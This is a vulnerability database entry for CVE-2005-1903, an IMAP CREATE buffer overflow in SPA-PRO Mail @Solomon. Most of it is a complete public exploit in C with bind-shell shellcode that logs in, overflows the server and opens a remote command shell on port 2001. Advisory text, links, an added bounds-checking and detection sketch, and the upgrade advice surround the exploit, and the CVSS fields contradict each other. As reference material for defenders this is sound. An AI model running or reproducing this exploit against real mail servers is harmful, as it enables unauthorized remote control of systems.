CVE-2005-1903
CVSS 2.1
Published: 2005-06-02 00:00:00
Revised: 2011-03-07 21:23:04

[Original] Buffer overflow in the IMAP service for SPA-PRO Mail @Solomon 4.00 allows remote authenticated users to execute arbitrary code via a long CREATE command.


[CNNVD] SPA-PRO Mail @Solomon IMAP Service Buffer Overflow Vulnerability (CNNVD-200506-027)

The IMAP service of SPA-PRO Mail @Solomon 4.00 contains a buffer overflow vulnerability; a remote authenticated user can execute arbitrary code by sending an over-long CREATE command.

- CVSS (Base Score)

CVSS score: 2.1 [LOW]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: NONE [no impact on system integrity]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required to exploit]

- CPE (Affected Platforms and Products)

Product and version information (CPE) not yet available

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1903
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1903
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200506-027
(Official data source) CNNVD

- Other Links and Resources

http://xforce.iss.net/xforce/xfdb/20862
(VENDOR_ADVISORY)  XF  spa-pro-create-bo(20862)
http://www.security.org.sg/vuln/spa-promail4.html
(VENDOR_ADVISORY)  MISC  http://www.security.org.sg/vuln/spa-promail4.html
http://www.osvdb.org/16990
(VENDOR_ADVISORY)  OSVDB  16990
http://secunia.com/advisories/15573
(VENDOR_ADVISORY)  SECUNIA  15573
http://www.vupen.com/english/advisories/2005/0680
(UNKNOWN)  VUPEN  ADV-2005-0680
http://securitytracker.com/id?1014095
(UNKNOWN)  SECTRACK  1014095

- Vulnerability Information

SPA-PRO Mail @Solomon IMAP Service Buffer Overflow Vulnerability
Severity: Low | Type: Buffer overflow
Published: 2005-06-02 00:00:00 | Updated: 2005-10-20 00:00:00
Access vector: Local
The IMAP service of SPA-PRO Mail @Solomon 4.00 contains a buffer overflow vulnerability; a remote authenticated user can execute arbitrary code by sending an over-long CREATE command.

- Advisories and Patches


- Vulnerability Information (1026)

e-Post SPA-PRO 4.01 (imap) Remote Buffer Overflow Exploit (EDBID:1026)
Platform: windows | Type: remote
Date: 2005-06-02 | Verified
Port: 143 | Author: Jerome Athias
//**************************************************************************
// e-Post SPA-PRO Mail @Solomon SPA-IMAP4S 4.01 Service Buffer Overflow 
// Vulnerability
//
// Bind Shell POC Exploit for Japanese Win2K SP4
// 31 May 2005
//
// This POC code binds shell on port 2001 of a vulnerable e-Post
// SPA-PRO Mail @Solomon IMAP server.
//
// This POC assumes default mailbox configuration C:\mail\inbox\%USERNAME%
// Any changes to the mailbox configuration will cause this POC to
// fail due to the length differences.
//
//
// Advisory 
// http://www.security.org.sg/vuln/spa-promail4.html
// http://www.security.org.sg/vuln/spa-promail4-jp.html
//
//**************************************************************************

#include <stdio.h>
#include <conio.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment (lib,"ws2_32.lib")


unsigned char expBuf[] = 
"2 create \""
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x55\x8B\xEC\x33\xC9\x66\xB9\xE8\x03\x2B\xE1\x32\xC0\x8B\xFC\xF3"
"\xAA\xB1\x30\x64\x8B\x01\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x70\x08"
"\xD9\xEE\xD9\x74\x24\xF4\x5F\x83\xC7\x0C\xEB\x53\x60\x8B\x6C\x24"
"\x24\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x8B\x7E\x20\x03\xFD\x8B"
"\x4E\x18\x56\x33\xDB\x8B\x37\x03\xF5\x33\xC0\x99\xAC\x85\xC0\x74"
"\x07\xC1\xCA\x0D\x03\xD0\xEB\xF4\x3B\x54\x24\x2C\x74\x09\x83\xC7"
"\x04\x43\xE2\xE1\x5E\xEB\x16\x5E\x8B\x7E\x24\x03\xFD\x66\x8B\x04"
"\x5F\x8B\x7E\x1C\x03\xFD\x8B\x04\x87\x01\x44\x24\x24\x61\xC3\x89"
"\x75\xF4\x68\x8E\x4E\x0E\xEC\x56\xFF\xD7\x59\x33\xC0\x66\xB8\x6C"
"\x6C\x50\x68\x33\x32\x2E\x64\x68\x77\x73\x32\x5F\x54\xFF\xD1\x8B"
"\xF0\x68\xD9\x09\xF5\xAD\x56\xFF\xD7\x5B\x83\xC4\x20\x6A\x01\x6A"
"\x02\xFF\xD3\x89\x45\xD0\x68\xA4\x1A\x70\xC7\x56\xFF\xD7\x5B\x33"
"\xC0\x50\xB8\xFD\xFF\xF8\x2E\x83\xF0\xFF\x50\x8B\xC4\x6A\x10\x50"
"\xFF\x75\xD0\xFF\xD3\x68\xA4\xAD\x2E\xE9\x56\xFF\xD7\x5B\xFF\x75"
"\xD0\xFF\xD3\x8B\xCC\x6A\x10\x8B\xDC\x68\x35\x54\x8A\xA1\x56\xFF"
"\xD7\x5A\x50\x50\x53\x51\xFF\x75\xD0\xFF\xD2\x8B\xD0\x68\xE7\x79"
"\xC6\x79\x56\xFF\xD7\x58\x89\x45\xF0\x8B\x75\xF4\x83\xC4\x20\xC6"
"\x04\x24\x44\xC6\x44\x24\x2D\x01\x89\x54\x24\x38\x89\x54\x24\x3C"
"\x89\x54\x24\x40\x8B\xC4\x8D\x58\x44\x68\x72\xFE\xB3\x16\x56\xFF"
"\xD7\x5A\xB9\xFF\x63\x6D\x64\xC1\xE9\x08\x51\x8B\xCC\x53\x53\x50"
"\x33\xC0\x50\x50\x50\x6A\x01\x50\x50\x51\x50\xFF\xD2\x5B\x68\xAD"
"\xD9\x05\xCE\x56\xFF\xD7\x58\x6A\xFF\xFF\x33\xFF\xD0\xFF\x74\x24"
"\x48\xFF\x55\xF0\xFF\x75\xD0\xFF\x55\xF0\x68\xEF\xCE\xE0\x60\x56"
"\xFF\xD7\x58\xFF\xD0\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\xe9\x4f\xfe\xff\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x54\x54\x54\x54"
"\x55\x55\x55\x55\x56\x56\x56\x56\x57\x57\x57\x57\xE9\x0C\xFE\xFF"
"\xFF\xCC\xEB\xa0\x5A\xD6\x19\xF8\x74\x41\x41\x41\x42\x42\x42\x42"
"\x43\x43\x43\x43\x44\x44\x44\x44\x45\x45\x45\x45\x46\x46\x46\x46"
"\x47\x47\x47\x47\x48\x48\x48\x48\x36\x49\x49\x49\x4A\x4A\x4A\x4A"
"\x4B\x4B\x4B\x4B\x4C\x4C\x4C\x4C\x4D\x4D\x4D\x4D\x4E\x4E\x4E\x4E"
"\x4F\x4F\x4F\x4F\x50\x50\x50\x50\x51\x51\x51\x51\x52\x52\x52\x52"
"\x53\x53\x53\x53\x54\x54\x54\x54\x55\x55\x55\x55\x56\x56\x56\x56"
"\x57\x57\x57\x57\x58\x58\x58\x58\x59\x59\x59\x59\x5A\x5A\x5A\x5A"
"\"\r\n";


void shell(int sockfd)
{
	char buffer[1024];
	fd_set rset;
	FD_ZERO(&rset);

	for(;;)
	{
		if(kbhit() != 0)
		{		
			fgets(buffer, sizeof(buffer) - 2, stdin);
			send(sockfd, buffer, strlen(buffer), 0);
		}

		FD_ZERO(&rset);
		FD_SET(sockfd, &rset);

		timeval tv;
		tv.tv_sec = 0;
		tv.tv_usec = 50;
		
		if(select(0, &rset, NULL, NULL, &tv) == SOCKET_ERROR)
		{
			printf("select error\n");
			break;
		}
        
		if(FD_ISSET(sockfd, &rset))
		{
			int n;

			ZeroMemory(buffer, sizeof(buffer));
			if((n = recv(sockfd, buffer, sizeof(buffer), 0)) <= 0)
			{
				printf("EOF\n");
				return;
			}
			else
			{
				fwrite(buffer, 1, n, stdout);
			}
		}
	}
}


#define ADDR_POSITION		534
#define RET_ADDR			0x74F819D6		// CALL EBX in Japanese Win2K SP4

// First short jump backwards. (EB AO) 
// You should know what to change here, landing onto INT 3 to let debugger kick in.
#define FIRST_BACKJMP_INST	0x5AA0EBCC


int main(int argc, char* argv[])
{
	WORD wVersionRequested;
	WSADATA wsaData;
	struct sockaddr_in sin;
	int err;
	char inBuffer[10000];
	char loginBuf[1000];

	if(argc != 4)
	{
		printf("\nUsage: %s <imap username> <imap password> <ip addr>\n", argv[0]);
		return 1;
	}

	if(strlen(argv[1]) <= 0 || strlen(argv[1]) > 20)
	{
		printf("\nInvalid IMAP username!  Maximum username length is 20.\n");
		return 1;
	}

	if(strlen(argv[2]) <= 0 || strlen(argv[2]) > 14)
	{
		printf("\nInvalid IMAP password!  Maximum password length is 14.\n");
		return 1;
	}

	memset(loginBuf, 0, sizeof(loginBuf));
	_snprintf(loginBuf, sizeof(loginBuf), "1 login \"%s\" \"%s\"\r\n", argv[1], argv[2]);
	loginBuf[sizeof(loginBuf)-1] = 0;

	int retPos = ADDR_POSITION - (strlen(argv[1]) - 1);
	
	*((DWORD *)&expBuf[retPos]) = RET_ADDR;
	*((DWORD *)&expBuf[retPos-4]) = FIRST_BACKJMP_INST;


	wVersionRequested = MAKEWORD(2,0);
	err = WSAStartup(wVersionRequested, &wsaData);
	if(err != 0)
	{
		printf("\nWSAStartup Error.\n");
		return 1;
	}

	if(LOBYTE(wsaData.wVersion) != 2 || HIBYTE(wsaData.wVersion) != 0)
	{
		printf("\nWinsock Version Error\n");
		WSACleanup();
		return 1;
	}

	SOCKET s = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, 0);

	sin.sin_addr.s_addr = inet_addr(argv[3]);
	sin.sin_family = AF_INET;
	sin.sin_port = htons(143);

	printf("\n[+] Trying to connect to %s\n", inet_ntoa(sin.sin_addr));

	if(connect(s, (sockaddr *)&sin, sizeof(sin)) != SOCKET_ERROR)
	{
		int size;
			
		// read IMAP banner
		size = recv(s, inBuffer, sizeof(inBuffer), 0);
		if(size == SOCKET_ERROR)
		{
			printf("[-] Error receiving IMAP banner!\n");
			return 1;
		}

		printf("[+] IMAP banner received!\n\n");
		fwrite(inBuffer, 1, size, stdout);
		printf("\n");

		if(send(s, (char *)loginBuf, strlen((char *)loginBuf), 0) == SOCKET_ERROR)
		{
			printf("[-] Error sending login!\n");
			return 1;
		}

		printf("[+] Login Sent.\n");

		size = recv(s, inBuffer, sizeof(inBuffer), 0);
		if(size == SOCKET_ERROR)
		{
			printf("[-] Error receiving login reply!\n");
			return 1;
		}
		if(strstr(inBuffer, "OK"))
			printf("[+] Login successful!\n");
		else
		{
			printf("[+] Login failed!\n");
			return 1;
		}

		if(send(s, (char *)expBuf, strlen((char *)expBuf), 0) == SOCKET_ERROR)
		{
			printf("[-] Error sending exploit!\n");
			return 1;
		}
		else
		{
			printf("[+] Exploit sent!\n");
		}

		Sleep(2000);

		//================================= Connect to the target ==============================
		SOCKET sock = socket(AF_INET, SOCK_STREAM, 0);
		if(sock == INVALID_SOCKET)
		{
			printf("Invalid socket return in socket() call.\n");
			WSACleanup();
			return -1;
		}

		sin.sin_family = AF_INET;
		sin.sin_port = htons(2001);
		sin.sin_addr.s_addr = inet_addr(argv[3]);

		if(connect(sock, (sockaddr *)&sin, sizeof(sin)) == SOCKET_ERROR)
		{
			printf("Exploit Failed. SOCKET_ERROR return in connect call.\n");
			closesocket(sock);
			WSACleanup();
			return -1;
		}
		
		printf("[+] Exploit successful!\n\n");
		shell(sock);
		closesocket(sock);	
	}
	else
	{
		printf("[-] Cannot connect!\n");
	}

	closesocket(s);
	WSACleanup();

	return 0;
}

// milw0rm.com [2005-06-02]

- Vulnerability Information

OSVDB 16990
SPA-PRO Mail @Solomon IMAP create Command Remote Overflow
Classification: Remote / Network Access, Input Manipulation
Impact: Loss of Integrity
Exploit: Public

- Vulnerability Description

A remote overflow exists in SPA-PRO Mail @Solomon. SPA-PRO Mail @Solomon fails to perform proper bounds checking on the create command resulting in a buffer overflow. With a specially crafted request, an attacker can cause a remote overflow resulting in a loss of integrity.
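The following is an added example, not code from the product or from any advisory linked on this page. It sketches the bounds checking the description says is missing: parse the quoted argument of an IMAP CREATE line, reject a mailbox name that does not fit a declared limit instead of truncating it, and build the on-disk path with a bounded write that fails rather than overruns. MAILBOX_ROOT (the default layout the PoC comments mention), the buffer sizes and all function names are assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Assumed values (not the product's): the default mailbox root the PoC above
 * depends on, a fixed path buffer, and an upper bound on mailbox names. */
#define MAILBOX_ROOT    "C:\\mail\\inbox\\"
#define PATH_BUF_SIZE   260
#define MAX_MAILBOX_LEN 64

static int starts_with_ci(const char *s, const char *word)   /* IMAP verbs are case-insensitive */
{
    for (; *word; s++, word++)
        if (tolower((unsigned char)*s) != tolower((unsigned char)*word)) return 0;
    return 1;
}

/* Pull the quoted mailbox name out of a line like:  2 create "Drafts"\r\n
 * Returns its length, -1 if the line is not a quoted CREATE, -2 if the name
 * does not fit in name_size: rejected outright, never silently truncated. */
int parse_create_mailbox(const char *line, char *name, size_t name_size)
{
    const char *p = line, *end; size_t len;
    while (*p && !isspace((unsigned char)*p)) p++;            /* skip the tag */
    while (isspace((unsigned char)*p)) p++;
    if (!starts_with_ci(p, "create ")) return -1;
    for (p += 7; isspace((unsigned char)*p); p++) ;
    if (*p != '"' || (end = strchr(++p, '"')) == NULL) return -1;
    len = (size_t)(end - p);
    if (len >= name_size) return -2;
    memcpy(name, p, len); name[len] = '\0';
    return (int)len;
}

/* Build <root><user>\<mailbox> with an explicit bound: fail instead of overrunning. */
int build_mailbox_path(char *out, size_t out_size, const char *user, const char *mailbox)
{
    int n = snprintf(out, out_size, "%s%s\\%s", MAILBOX_ROOT, user, mailbox);
    if (n < 0 || (size_t)n >= out_size) { out[0] = '\0'; return -1; }
    return n;
}

/* One received CREATE line, end to end: 0 = accepted, negative = rejected. */
int handle_create_line(const char *line, const char *user, char *path, size_t path_size)
{
    char name[MAX_MAILBOX_LEN + 1];
    if (parse_create_mailbox(line, name, sizeof name) < 0) return -1;
    return build_mailbox_path(path, path_size, user, name) < 0 ? -2 : 0;
}
```

The same parser run over captured IMAP traffic gives a simple detection signal: any CREATE whose argument parse_create_mailbox rejects with -2 is far longer than a legitimate mailbox name.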

- Timeline

2005-06-02 Unknown
Unknown Unknown

- Solution

Upgrade the SPA-IMAP4S component to version 4.05 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related References

- Vulnerability Author
